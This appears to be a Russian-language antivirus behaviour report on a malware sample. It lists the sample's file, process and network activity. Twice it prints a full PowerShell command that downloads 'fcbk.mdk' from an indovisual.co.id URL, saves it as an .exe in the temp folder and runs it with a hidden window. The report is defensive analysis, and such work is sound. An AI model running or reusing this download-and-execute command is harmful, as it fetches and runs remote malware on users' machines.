Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://indovisual.co.id/system/helper/json/fcbk.mdk как %temp%\hgtjx.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://indovisual.co.id/system/helper/json/fcbk.mdk','%TMP%\hgtjx.exe');Start-Process '%TMP%\hgtjx.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1900
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1217931.cvr
Сетевая активность
Подключается к
- 'in####sual.co.id':80
- 'in####sual.co.id':443
TCP
Запросы HTTP GET
- http://in####sual.co.id/system/helper/json/fcbk.mdk
Другие
- 'in####sual.co.id':443
UDP
- DNS ASK in####sual.co.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://indovisual.co.id/system/helper/json/fcbk.mdk','%TMP%\hgtjx.exe');Start-Process '%TMP%\hgtjx.exe';' (со скрытым окном)
